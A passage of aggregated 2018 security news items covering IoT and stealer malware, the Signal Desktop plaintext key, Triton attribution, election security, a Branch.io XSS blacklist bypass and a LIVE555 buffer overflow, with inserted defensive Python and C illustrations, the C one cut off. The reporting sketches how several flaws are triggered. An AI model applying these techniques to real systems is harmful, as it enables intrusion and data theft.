ZoneFox’s machine learning-based threat-hunting technology will complement FortiClient endpoint security, Fortinet says. Thus, the company will provide endpoint detection and response (EDR) and will also add more user entity behavior analytics (UEBA) features to FortiSIEM.

“Fortinet expects that the new endpoint security capabilities provided by ZoneFox will allow enterprise organizations to better leverage machine learning to detect anomalous behavior and provide an even faster response to insider threats,” the company says.

This is the second acquisition Fortinet has made within four months, after acquiring Boston-based network security firm Bradford Networks in July.

Chalubo, a new IoT botnet emerges in the threat landscape
24.10.2018 securityaffairs
IoT  BotNet

Security experts from Sophos Labs have spotted a new piece of IoT malware tracked as Chalubo that is attempting to recruit devices into a botnet used to launch DDoS attacks.
Security experts from Sophos Labs have spotted a new piece of Linux malware tracked as Chalubo (ChaCha-Lua-bot) that is targeting IoT devices in an attempt to recruit them into a botnet used to launch DDoS attacks.

The new IoT malware borrows code from the Xor.DDoS and Mirai bots, and it also implements fresh evasion techniques: for example, the authors have encrypted both the main component and its corresponding Lua script using the ChaCha stream cipher.

“Since early September, SophosLabs has been monitoring an increasingly prolific attack targeting Internet-facing SSH servers on Linux-based systems that has been dropping a newly-discovered family of denial-of-service bots we’re calling Chalubo.” reads the analysis from Sophos Labs.

“The attackers encrypt both the main bot component and its corresponding Lua script using the ChaCha stream cipher.”

The malware was first spotted in late August; at the time, operators were issuing commands that instructed devices to download malicious code composed of three components: a downloader, the main bot, and the Lua command script. The attackers were using brute-force attacks (with the root:admin credential pair) against SSH servers to distribute the malware.

“These types of simple attacks on our honeypots are quite common, but what made this stand out was the libsdes sample.” continues the analysis.

“This bot demonstrates increased complexity compared to the standard Linux bots we typically see delivered from these types of attacks. Not only are the attackers using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware.”


The IoT malware ran only on systems with an x86 architecture.

Starting in mid-October, operators have been issuing commands that retrieve the Elknot dropper, which delivers the remaining parts of the Chalubo (ChaCha-Lua-bot) package.

The most important novelty is represented by the discovery of a variety of bot versions, designed to target different architectures, including 32-bit and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, and PowerPC.

This suggests that the attackers were testing the bot in August and are now expanding the list of potential targets in the current campaign.

Experts noticed that the downloader also drops a script in the same way the Xor.DDoS bot family does, which suggests the authors borrowed the code from that older threat. The attackers also copied a few code snippets from the infamous Mirai bot, such as some of the randomizing functions and an extended form of the util_local_addr function.

Researchers noted that the majority of the code in the bot is new; the authors focused on their own Lua handling for launching DoS attacks in DNS, UDP, and SYN flavours.

The bot’s Lua script first connects to the command and control (C&C) server to provide details on the infected machine and to receive further instructions. The script also downloads, decrypts, and executes whatever Lua script it is served.

To mitigate the threat, experts recommend that sysadmins of SSH servers, including IoT devices, change any default passwords on those systems.

Further details, including IoCs, are reported in the analysis published by Sophos.

For the first time Japanese commission ordered Facebook to improve security
24.10.2018 securityaffairs

The Japanese government ordered Facebook to improve the protection of users’ personal information following the recent data breaches that exposed data from millions of people.
At the end of September, Facebook admitted that attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of 50 Million Users.

A couple of weeks ago, the social network giant announced that hackers had accessed the data of 29 million users, fewer than the 50 million initially thought.

According to the company, the vulnerability is the result of the chaining of three flaws affecting the “View As” feature and Facebook’s video uploader.

Facebook clarified that the version of the video uploader interface affected by the flaw was introduced in July 2017.

On Monday, Japan’s Personal Information Protection Commission ordered a further investigation of the data breach and asked the company to implement preventive security measures.

This is the first time that the commission has issued warnings to the social network giant, after conducting an investigation together with British authorities.

According to government spokesman Yoshihide Suga, Facebook told Japanese authorities that the recent data breach also included Japanese users.

The commission also ordered the company to improve communication with users by being more transparent about the way it manages their data and by promptly responding to requests to delete accounts.


Another incident involving the company, the Cambridge Analytica privacy scandal, affected 87 million users, including up to 100,000 Japanese users.

“It is the first time that the commission, which investigated the data leak with British authorities, has issued warnings to Facebook,” an official told AFP.

Facebook added on its website that it is committed to “promptly inform users if the platform was inappropriately used and cooperate with the commission and other countries’ regulators.”

To Secure Medical Devices, the FDA Turns to Ethical Hackers
24.10.2018 securityaffairs

The U.S. Food and Drug Administration (FDA) is embracing the work of ethical hackers and their researches to secure medical devices.
Hacking is an ever-present concern in today’s highly connected society. People typically shudder to think about their smart speakers or home security systems getting compromised, and indeed, vulnerabilities in those devices would be traumatizing.

But, the consequences could arguably be much worse if hackers set their sights on medical devices. Those products are widely used and show a forecasted growth of three percent annually through at least 2022.

Ethical hackers have contacted device manufacturers after exposing vulnerabilities in their products. All the while, the U.S. Food and Drug Administration (FDA) has historically stayed neutral in the debate about what role, if any, those individuals should play in exposing weak spots in medical technologies.

But, that’s changing as the agency reports it’s embracing the work of ethical hackers and using the research those parties find to shape their actions.


A Problem Revealed in Pacemaker Implants
A recent example of a medical device problem concerns a pacemaker manufactured by Medtronic. Billy Rios and Jonathan Butts, two cybersecurity researchers, found a flaw that could let hackers remotely change the settings of the device, potentially leading to dire consequences.

Then, the FDA and Medtronic issued cybersecurity warnings about the pacemakers. Additionally, Medtronic stopped the device’s periodic Internet-based updates on tens of thousands of the pacemakers until the company comes up with an effective fix for the problem.

The FDA Provided Much-Needed Momentum
The FDA was instrumental in making Medtronic respond after hearing about the pacemaker’s security shortcomings. Butts and Rios disclosed the flaw to Medtronic in January 2017, but it took more than a year for the company to release security bulletins responding to the identified issues.

The company asserted, though, that it wasn’t possible to remotely manipulate the devices. It also said the vulnerability was “controlled,” and not an immediate patient threat. The two ethical hackers continued engaging back and forth with Medtronic for months, then gave their research to the FDA. The agency followed up by doing its own analysis.

Ultimately, the FDA said its findings matched the previous investigation, and that statement caused Medtronic to admit the bugs could hurt patients if not patched. Such progress emphasizes why the FDA’s collaboration with cybersecurity researchers could be so advantageous for the technology community and consumers alike.

To reiterate, the researchers tried for months to get the manufacturer to take their concerns seriously, to no avail. It was the FDA’s involvement that brought about the company’s crucial change in attitude. If such partnerships continue, patients could benefit from safer products as ethical hackers get more recognition for their worthy research.

A Future-Oriented Mindset
It also appears the situation above won’t be a one-off instance of the FDA’s collaboration with ethical hackers. According to Jeff Shuren, director of the FDA’s Center for Devices and Radiological Health, there is a recognition that cybersecurity researchers have a crucial role to play in revealing medical device issues that could be disastrous if left unchecked.

For example, some of the possible ways to manipulate medical devices include making them behave strangely without a patient or caregiver’s knowledge, or causing the gadgets to give incorrect readings that could change a user’s treatment plan. Hacks could also make diagnostic equipment, such as MRI machines, shut down.

When speaking to The Washington Post, Shuren mentioned the importance of “proactively cultivat[ing] that relationship with the researcher community because they have an integral role to play.” That statement strongly implies the FDA is finally taking the side of the cybersecurity community by affirming how its researchers could be partners in making medical devices as secure as possible.

Shuren also noted that the FDA encourages device manufacturers to rely on ethical hackers internally as well, especially if those companies don’t have people already on board to explore possible shortcomings and fix them before product releases.

The FDA and Department of Homeland Security have signed a memorandum of agreement to work more closely with each other to secure medical devices, too. The hope is that when vulnerabilities are identified, the teamwork between the two agencies would lead to being able to stay on top of medical technologies as they change and assisting medical companies with responding to the security weaknesses.

Government Agencies Present at Cybersecurity Conferences
In August 2018, a representative from Shuren’s department at the FDA attended a presentation Butts and Rios made at a cybersecurity conference to demonstrate another issue — this time with an insulin pump. In response to a Twitter post about that exhibition, FDA Commissioner Scott Gottlieb gave the ethical hackers a nod of approval.

The partnership between government agencies and ethical hackers is still new, and it’s too soon to say if it will be maintained. That outcome looks probable, though, which brings significant and long-lasting benefits.

The new Azorult 3.3 is available in the cybercrime underground market
24.10.2018 securityaffairs

A new version of the Azorult info-stealer appeared in the wild, it is able to steal more data, including other types of cryptocurrencies
A new version of the Azorult info-stealer appeared in the wild, it is able to steal more data, including other types of cryptocurrencies, and implements new features.

The latest version of Azorult was delivered through the RIG exploit kit as well as other sources; previous variants were mainly distributed as weaponized Office documents attached to phishing messages.

AZORult is a data stealer that was first spotted in 2016 by Proofpoint, which found it being delivered as a secondary infection via the Chthonic banking trojan. It was later used in many malspam attacks, but only in July 2018 did the authors release a substantially updated variant.


In July, the experts discovered a new sophisticated version of the AZORult Spyware that was involved in a large email campaign on July 18.

The malicious code allows crooks to steal credentials, payment card data, browser histories and contents of cryptocurrency wallets.

Now experts from Check Point have discovered a new version that is being advertised in an underground forum.


The new version is a substantial update of the previous one, authors implemented new features such as the ability to steal additional forms of cryptocurrency from the victims’ wallets, including BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore and Exodus Eden.

“During the last week, Check Point Research spotted a new version of Azorult in the wild being delivered through the RIG exploit kit, as well as other sources.” reads the analysis published by the experts.

“There are quite a few changes in this newly witnessed variant, the most prominent ones being a new encryption method of the embedded C&C domain string, a new connection method to the C&C and improvement of the Crypto currency wallets stealer and loader.”

The new variant implements a new encryption method to protect the hardcoded C&C domain string, along with a new key for connecting to the command and control server.

The new variant was first offered for sale on October 4, a few days after the source code for Azorult versions 3.1 and 3.2 was leaked online. Earlier this month, experts from CheckPoint discovered on the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.

Experts speculate that the author of Azorult released a new version of the data stealer in response to the leak of the source code.

“Moreover, we have witnessed and written about another project related to Azorult, dubbed ‘Gazorp’ – a dark web binary builder that allows anyone to craft the malware’s binaries for free.” continues CheckPoint.

“Having this in mind, it is plausible that the Azorult’s author would like to introduce new features to the malware and make it worthy as a product in the underground market.” continues CheckPoint.

Further technical details, including IoCs, are reported in the analysis published by CheckPoint.

Message Decryption Key for Signal Desktop application stored in plain text
24.10.2018 securityaffairs

The reverse engineering researcher Nathaniel Suchy discovered that the Signal Desktop application leaves the message decryption key in plain text, exposing it to an attacker.
The Signal Desktop application leaves the message decryption key in plain text, potentially exposing it to an attacker. The issue was discovered by the reverse engineering researcher Nathaniel Suchy.

The flaw affects the process implemented by the Signal Desktop application to encrypt locally stored messages.

Signal Desktop application leverages an encrypted SQLite database called db.sqlite to store the user’s messages. The encryption key for the encrypted database is generated by the application during the installation phase.

The key is stored in plain text in a local file called %AppData%\Signal\config.json on Windows PCs and ~/Library/Application Support/Signal/config.json on a Mac.

The encryption key is used each time the Signal Desktop application accesses the database.


“To illustrate this problem, BleepingComputer installed the Signal Desktop application and sent a few test messages. First we opened our config.json file to retrieve the encryption key, which is shown above.” reads a blog post published by Bleeping Computer.

“We then opened the database located at %AppData%\Roaming\Signal\sql\db.sqlite using a program called SQLite Database Browser.”

By entering the key, the experts at Bleeping Computer were able to read the content of the database.

The issue could be easily addressed by requiring users to set a password that would be used to encrypt the database encryption key.

“This would be easily mitigated by requiring users to set a password and using that password to encrypt the key” Suchy told Bleeping Computer.
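As an added illustration (not Signal's code), the following Python checks a config.json of the kind described above for an unwrapped database key and applies the mitigation Suchy proposes: the key is wrapped under a password-derived key and only the wrapped form is written to disk. The "key" field name, the sample key value and the wrapping construction (scrypt KDF, HMAC-SHA256 keystream in counter mode, encrypt-then-MAC tag) are constructed assumptions chosen so the example runs on the standard library alone.

```python
"""Constructed example: detect a plaintext SQLCipher key in a Signal-style
config.json and wrap it under a password-derived key (standard library only)."""
import hashlib
import hmac
import json
import secrets

# Constructed sample key (64 hex chars = 32 bytes); not a real Signal key.
SAMPLE_KEY = "0f1e2d3c4b5a69788796a5b4c3d2e1f00123456789abcdef0123456789abcdef"
# Assumed layout of config.json: the database key sits in a top-level "key" field.
SAMPLE_CONFIG = json.dumps({"key": SAMPLE_KEY})


def find_plaintext_key(config_text: str):
    """Return the hex key if config.json exposes it unwrapped, else None."""
    cfg = json.loads(config_text)
    key = cfg.get("key")
    if isinstance(key, str) and len(key) == 64:
        try:
            bytes.fromhex(key)
            return key
        except ValueError:
            pass
    return None


def _kek(password: bytes, salt: bytes) -> bytes:
    # scrypt makes brute-forcing the user's password expensive; 64 bytes give
    # a 32-byte encryption key and a separate 32-byte MAC key.
    return hashlib.scrypt(password, salt=salt, n=2 ** 14, r=8, p=1, dklen=64)


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    # HMAC-SHA256 in counter mode; the nonce is fresh per wrap so the stream
    # is never reused under the same key.
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(enc_key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def wrap_key(db_key_hex: str, password: str) -> dict:
    """Encrypt-then-MAC the database key under the password; returns what
    should be stored in config.json instead of the raw key."""
    salt = secrets.token_bytes(16)
    nonce = secrets.token_bytes(16)
    kek = _kek(password.encode(), salt)
    enc_key, mac_key = kek[:32], kek[32:]
    db_key = bytes.fromhex(db_key_hex)
    ct = bytes(a ^ b for a, b in zip(db_key, _keystream(enc_key, nonce, len(db_key))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return {"kdf": "scrypt", "salt": salt.hex(), "nonce": nonce.hex(),
            "wrapped_key": ct.hex(), "tag": tag.hex()}


def unwrap_key(entry: dict, password: str) -> str:
    """Recover the database key; raises ValueError on a wrong password or a
    tampered entry (the tag is checked before anything is decrypted)."""
    salt = bytes.fromhex(entry["salt"])
    nonce = bytes.fromhex(entry["nonce"])
    ct = bytes.fromhex(entry["wrapped_key"])
    tag = bytes.fromhex(entry["tag"])
    kek = _kek(password.encode(), salt)
    enc_key, mac_key = kek[:32], kek[32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("wrong password or tampered config")
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct)))).hex()


def password_opens(entry: dict, password: str) -> bool:
    """True if the password unwraps the entry, False otherwise."""
    try:
        unwrap_key(entry, password)
        return True
    except ValueError:
        return False


def harden_config(config_text: str, password: str) -> str:
    """Rewrite a config that exposes its key so only the wrapped key remains."""
    cfg = json.loads(config_text)
    raw = find_plaintext_key(config_text)
    if raw is not None:
        cfg["wrapped_key"] = wrap_key(raw, password)
        del cfg["key"]
    return json.dumps(cfg)


if __name__ == "__main__":
    print("exposed key:", find_plaintext_key(SAMPLE_CONFIG))
    hardened = harden_config(SAMPLE_CONFIG, "correct horse battery")
    print("after hardening, exposed key:", find_plaintext_key(hardened))
    print("recovered:", unwrap_key(json.loads(hardened)["wrapped_key"], "correct horse battery"))
```

The trade-off is the one Suchy's remark implies: the application then has to prompt for the password at startup, since nothing on disk can reproduce the key on its own.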

In August 2018, the Italian cybersecurity enthusiast Leonardo Porpora discovered that it was possible to recover expired messages from Signal version 1.14.3.

Russian Government-owned research institute linked to Triton attacks
24.10.2018 securityaffairs
BigBrothers  ICS  Virus

Security experts from FireEye found evidence that links the development of the Triton malware (aka Trisis and HatMan) to a Russian government research institute.
In December 2017, experts from FireEye discovered a new strain of malware dubbed Triton that was specifically designed to target industrial control systems (ICS).

The Triton malware has been used in attacks aimed at a critical infrastructure organization in the Middle East; experts suspect the involvement of a state-sponsored actor with sabotage motives, given the lack of financial motivation and the level of sophistication of the attacks.

According to experts at Dragos, the threat actor behind the malware, tracked as Xenotime, has been around since at least 2014. The APT group was uncovered in 2017 after it caused a shutdown at a critical infrastructure organization in Saudi Arabia.

The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.


Once they had gained access to the SIS system, the threat actors deployed the TRITON malware, which indicates that they had knowledge of such systems. According to FireEye, the attackers pre-built and tested the tool, which would require access to hardware and software that is not widely available. TRITON is also designed to communicate using the proprietary TriStation protocol, which is not publicly documented; this implies that the attackers reverse engineered the protocol to carry out the attack.

The Triton malware interacts with Triconex SIS controllers; it is able to read and write programs and functions to and from the controller.

FireEye experts discovered a link between the Triton intrusion activity, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a Russian government research institute in Moscow.


FireEye collected strong evidence suggesting that the Russian CNIIHM institute has been involved in the development of some of the tools used in the Triton attack.

“FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post.” reads the analysis published by FireEye.

“FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.”

Experts pointed out that Triton is linked to Russia, the CNIIHM, and an individual located in Moscow. Some of the TEMP.Veles hacking tools were tested using an unnamed online scan service. A specific user of the service, active since 2013, has tested various tools over time.

The user also tested several customized versions of widely available tools, including Metasploit, Cobalt Strike, PowerSploit, the PowerShell-based WMImplant, and cryptcat.

In many cases, the custom versions of the tools were used in TEMP.Veles attacks just days after being submitted to the testing environment.

The experts discovered that a PDB path contained in a tested file included a string that appears to be an online moniker associated with a Russia-based individual active in Russian information security communities since at least 2011.

According to a now-defunct social media profile, the individual was a professor at CNIIHM.

FireEye also discovered that one IP address registered to the Russian research institute was involved in the Triton attacks.

“While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool,” FireEye continues.

“We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.”

Experts cannot exclude that some employees of CNIIHM carried out the attack without any involvement of the institute.

“Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval. However, this scenario is highly unlikely.” FireEye concludes.

Japan Orders Facebook to Improve Data Protection
23.10.2018 securityweek

The Japanese government on Monday ordered Facebook to improve protection of users' personal information following data breaches affecting tens of millions of people worldwide.

Facebook said early this month that hackers accessed the personal data of 29 million users in a breach at the world's leading social network first disclosed late September.

The company had originally said up to 50 million accounts were affected in a cyberattack that exploited a trio of software flaws to steal "access tokens" that enable people to automatically log back onto the platform.

Japan's Personal Information Protection Commission on Monday demanded the social media giant investigate why the personal data was hacked and draw up preventive measures.

Facebook told Japanese authorities the 29 million people hacked in the latest attack may include Japanese users, top government spokesman Yoshihide Suga has said.

Facebook also acknowledged earlier this year that tens of millions of users had their personal data hijacked by Cambridge Analytica, a British political firm which worked for Donald Trump in 2016.

Up to 100,000 Facebook users may have been affected in Japan in that scandal, the commission said.

"It is the first time that the commission, which investigated the data leak with British authorities, has issued warnings to Facebook," an official told AFP.

The commission also ordered Facebook to communicate better with users and respond to them promptly, for example when they request their accounts be deleted.

Facebook pledged to "promptly inform users if the platform was inappropriately used and cooperate with the commission and other countries' regulators" on its website.

Recent Branch.io Patch Creates New XSS Flaw
23.10.2018 securityweek

The patch for a recently disclosed cross-site scripting (XSS) vulnerability in Branch.io introduced another similar flaw, a security researcher revealed last week.

California-based Branch.io provides customers with solutions that help create deep links for referral systems, invitations, and sharing links for attribution and analytics purposes. The service is used by many popular web platforms, including imgur, Shopify, Tinder and Yelp.

Recently, researchers at vpnMentor discovered a vulnerability in Branch.io that potentially exposed hundreds of millions of users to XSS attacks. The bug was addressed quickly and there was no evidence of malicious exploitation.

Now, Detectify security researcher Linus Särud reveals that the patch actually resulted in another XSS vulnerability. Furthermore, he explains that exploitation of this bug is actually possible using the payload for a flaw he discovered several months ago and which had been previously addressed.

The researcher discovered the initial vulnerability on a page apparently designed to redirect to a mobile app. The vulnerable file would check the protocol of the redirect parameter against a blacklist and continue with the redirection if the protocol was not found on it.

“To exploit this we need to create a link that will execute as Javascript while the protocol of it is not ‘javascript’. As far as I know this should not be possible according to browser specifications,” Särud notes.

After discovering that the blacklist could be bypassed with an empty protocol, he was eventually able to create a working exploit for Safari and then reported the bug to some of the bigger sites that used Branch.io. Apple too was notified of the issue.

Branch.io, which Särud does not name in his blog post and refers to as a “SaaS vendor,” was also alerted and a fix was released, but only a temporary one that actually broke the page the bug was discovered on, the researcher says. Following vpnMentor’s report, however, he discovered that the initial, temporary fix was apparently replaced with a permanent one.

“What makes everything interesting is that the initial payload still worked, even after the vulnerabilities found by vpnMentor had been resolved. The fix for the second vulnerability was still vulnerable to a third vulnerability, using the very same payload as in the first report,” Särud says.

The bug, however, was no longer pure DOM-based XSS (where the payload is executed by modifying the DOM environment in the victim’s browser). The URL parameters were reflected server side, but the attack “more or less still worked in the same way.”

“The solution of fixing the third vulnerability was now to add ‘ ‘ and ‘:’ to the blacklist,” Särud reveals. Because the function needs to support a variety of different custom app protocols, the use of a whitelist instead of a blacklist is likely impossible, although strongly recommended, the researcher concludes.

While Apple was informed on the protocol bug when it was initially discovered, the attack still works in the latest version of Safari, on both macOS and iOS.

Securing the Vote Against Increasing Threats
23.10.2018 securityweek

With the U.S. mid-term elections just a couple of weeks away, there are continuing concerns over the security of the electronic voting procedures used by many states. These concerns range from the integrity of state voter registration databases through the compromise of individual voting machines to the accuracy of their calibration without a paper audit trail to confirm accurate vote tallying.

Hacking the vote can be differentiated from manipulating the voter. Russian attempts to manipulate voters occurred in the 2016 presidential election, and are happening now with the mid-terms. On Friday, October 19, a Russian national named Elena Alekseevna Khusyaynova, 44, was charged for her alleged role in a Russian conspiracy to interfere in the U.S. political system, including the 2018 midterm election.

According to the DoJ, Khusyaynova operated as chief accountant for 'Project Lakhta', which allegedly used social media and other internet platforms to address topics ranging from immigration, gun control and the Second Amendment, the Confederate flag, race relations, LGBT issues, the Women's March, and the NFL national anthem debate. The project sought to conduct what it called internally "information warfare against the United States."

It is against this background of active and continued foreign 'meddling' in U.S. elections that the security of the vote itself has become a serious concern.

The state of Georgia provides an illustration of these concerns. The Coalition for Good Governance and citizens of Georgia sued the Secretary of State in an attempt to force a block on the state using electronic voting in the mid-terms. They cited insecurity of the devices, lack of a paper audit trail, and possible compromise of the state's voter registration database.

In this instance, Judge Amy Totenberg denied the plaintiffs' motion, but made it clear that she would be receptive to future applications. She also made it clear that she was unhappy with the way the state handled "the ramifications of the major data breach and vulnerability at the Center for Election Services", which is where the Georgia voter registration database had been left exposed to the internet.

Malicious manipulation of the database could have a serious effect on the accuracy of votes. Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, "If I were a hacker trying to affect an election in this state, that's where I would start." With no suggestion of a connection, it is noticeable that early voters by 18 October (in person or by mail) were up 230% on the number of early voters at the same time in 2014 (figures from the BBC). At the same time, many of the postal votes are being rejected. Figures sent to SecurityWeek by the Coalition for Good Governance suggest that in one Georgia county 11.1% of African-American postal votes, 15.3% of Asian-American postal votes, and 3.8% of Caucasian postal votes had been rejected by election officials by October 18.

Georgia is not the only state where concerns have been raised over the integrity of the voter registration database. On October 15, 2018, Anomali posted a blog, 'Estimated 35 Million Voter Records For Sale on Popular Hacking Forum'. The details purport to be current, and come from 19 different states -- including Georgia.

Anomali writes, "Given the illicit vendor claims of weekly updates of voter records and their high reputation on the hacker forum, we assess with moderate confidence that he or she may have persistent database access and/or contact with government officials from each state. These types of unauthorized information disclosures increase the threat of possible disruptive attacks against the U.S. electoral process such as voter identity fraud and voter suppression."

The potential for persistent access to voter registration databases in multiple states is concerning. In this instance, however, Mark Arena (CEO at Intel 471, which worked with Anomali on the discovery) told SecurityWeek, "Intel 471 has not seen any indication that threat actors are seeking to use the voter data to influence the elections. We assess that the most likely potential use of this voter data is for fraud as per other compromised databases with similar personally identifiable information."

Protecting these databases should be relatively simple -- it's what business does all the time. It seems clear, however, that many states have not taken as much care as is necessary. Of course, this is not a problem specific to election databases. However, stringent data protection laws with hefty financial sanctions (such as GDPR) are forcing companies to take more concern over how and where they store personal data. It is likely that if states and state officials were subject to serious sanctions, voter registration databases would be kept more secure for future elections.

Protecting the individual voting machines -- especially those known as direct-recording election (DRE) systems, which do not produce a paper audit trail -- is a much harder task. SecurityWeek turned to Darien Kindlund, VP of technology at Insight Engines, to gain an understanding.

Kindlund pointed to two primary problems making voting machine security difficult. The first is the age of most systems, and the second is the nature of their use.

Forty-one states will be using equipment that is more than 10 years old. Old computers may be running operating systems that are no longer supported, while there is no easy way to ensure that those supported have received the correct level of patches. In fact, it is estimated that 41 states will use voting machines that are no longer manufactured.

The machines themselves spend most of their time in storage -- which, provided physical security can be maintained, ensures an effective air-gap. At the time of an election, however, DRE systems are wheeled-out and plugged into the internet to allow votes to be cast, accumulated and counted.

The sheer volume of aging machines that suddenly come into play places an exceedingly heavy, but sporadic, load on the teams charged with securing them. Georgia, for example, has 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE.

Georgia was the first state to move to electronic voting starting in 2002, and some of the systems are that old. As long ago as 2007, Princeton University's Feldman, Halderman and Felten analyzed the AccuVote systems and concluded, "the machine is vulnerable to a number of extremely serious attacks that undermine the accuracy and credibility of the vote counts it produces."

Nothing much has changed. At this year's Vote Hacking Village at Def Con, 35 out of 39 children aged between six and 17 were able to break into facsimiles of government election results websites, developed by former White House technology advisor Brian Markus, within three hours. The machines themselves fared little better. One system was using SSL certificates five years old, another had a removable memory card containing supervisor passwords in plain text, and another was running unsupported Windows XP that could be hacked in seconds.

The argument that the voting machines are kept securely off-line while not in use isn't valid. Kindlund points out that in use they are connected to the internet and could be compromised during that period. "Even while off-line," he added, "if attackers can gain access to one machine, it could be compromised. No security expert would guarantee that it could not be compromised with a stealthy malware that could spread worm-like once the machines are connected for an election."

But they remain just computers, and the security industry has been protecting computers for years. The biggest problem, suggests Kindlund, is the requirement for a small security team to monitor a large number of machines that is not part of their normal day-to-day workload. The solution, he suggests, is occasional checking by automated means.

His own firm, for example, offers Insight Investigator for Splunk. This is powered by a natural language processor that allows less-qualified staff to query a Splunk database. It could accept and respond to conversational queries such as, "Show me DRE systems with updates by status this week"; "Show me vulnerable winvote systems this week versus last week"; and for those DRE systems with remote access capabilities, "Show me logins to accuvote systems by source ip and dest ip this week".

Such methods would highlight vulnerable systems easily and within an acceptable timeframe -- allowing them to be made secure ahead of a vote.

The consensus among security experts is that electronic voting is not currently secure -- but there is no reason that it could not be made as secure as any other computer-based system. It just requires more effort and expenditure to do so. For now, there is no public evidence that any foreign power is attempting to sway the outcome of the 2018 U.S. mid-term elections through hacking the vote. But it wouldn't need to. If a foreign policy is to spread confusion, dissension and distrust within an adversary population, it has already succeeded. And it will continue to succeed until the vote is acknowledged to be secure, and the entire population is confident that their own vote will be accurately counted.

Hackers Deface Website of Saudi Investment Forum
23.10.2018 securityweek Hacking

A website for a Saudi investment summit was down on Monday after an apparent cyber attack, just a day before the three-day conference overshadowed by the murder of journalist Jamal Khashoggi begins.

There was no immediate claim of responsibility for the apparent attack on the Future Investment Initiative (FII) website, as organisers scrambled to prepare for the summit after a string of cancellations from global business titans over the murder.

Hackers appeared to deface the website with a host of critical messages over its role in the war in Yemen and accusing the kingdom of terrorism financing.

The website was later taken down.

Organisers of FII did not respond to requests for comment. Local media, including the pro-government Okaz newspaper, said the website had come under an "electronic attack".

The forum, nicknamed "Davos in the desert", was meant to project the historically insular petro-state as a lucrative business destination and set the stage for new ventures and multi-billion dollar contracts.

But it has been overshadowed by growing global outrage over the murder of Khashoggi inside the kingdom's consulate in Istanbul.

Dozens of global executives -- from bankers JP Morgan to carmaker Ford and ride-hailing app Uber -- have scrapped plans to attend.

Flaw in Media Library Impacts VLC, Other Software
23.10.2018 securityweek

A serious vulnerability in the LIVE555 Streaming Media RTSP server affects popular applications, including VLC, MPlayer and others, Cisco Talos has discovered.

Developed by Live Networks, Inc, LIVE555 Streaming Media represents a set of open-source C++ libraries meant for multimedia streaming. The libraries provide support for open standards used in streaming, but can also be used for the management of various popular video and audio formats. In addition to media players, the libraries are used for cameras and other embedded devices.

Recently, security researcher Lilith Wyatt of Cisco Talos discovered an exploitable code execution bug in the HTTP packet-parsing functionality of the LIVE555 RTSP server library. An attacker can achieve code execution by sending a specially crafted packet to cause a stack-based buffer overflow.

Tracked as CVE-2018-4013, the vulnerability was found in a function that parses HTTP headers for tunneling RTSP over HTTP. The ability to tunnel RTSP over HTTP, enabled by LIVE555 for the standard RTSP server, is served by a different port bound by the server.

Typically TCP port 80, 8000, or 8080 is used, depending on what is available on the host machine. Because this port also includes support for normal RTSP, it is possible for the HTTP client to negotiate the RTSP-over-HTTP tunnel on it.

To exploit the security bug, an attacker could create a packet containing multiple "Accept:" or "x-sessioncookie" strings, thus leading to a stack buffer overflow in the function "lookForHeader."

The vulnerability, which has a CVSSv3 score of 10.0, has been confirmed to affect Live Networks LIVE555 Media Server version 0.92 (older versions may also be impacted). Live Networks addressed the vulnerability last week.
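As an added illustration (not LIVE555's own code, and not a reproduction of its `lookForHeader` internals), the following C routine shows the bounded way of extracting a header such as `x-sessioncookie` or `Accept` from an RTSP-over-HTTP request: the copy is limited by the destination size, and a header that occurs more than once is refused instead of being processed again. Function names and the sample requests are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Outcome of a bounded header lookup. */
enum hdr_result { HDR_FOUND = 0, HDR_ABSENT = 1, HDR_TOO_LONG = 2, HDR_DUPLICATE = 3 };

/* Case-insensitive comparison of the first n bytes of a and b. */
static int ieq(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Scan an HTTP request (req, req_len; need not be NUL-terminated) for header
 * `name` and copy its value into out (out_size bytes). The copy is bounded by
 * the destination size, the result is always NUL-terminated, and a header that
 * appears more than once is refused instead of being processed a second time.
 * Nothing is ever written beyond out_size bytes. */
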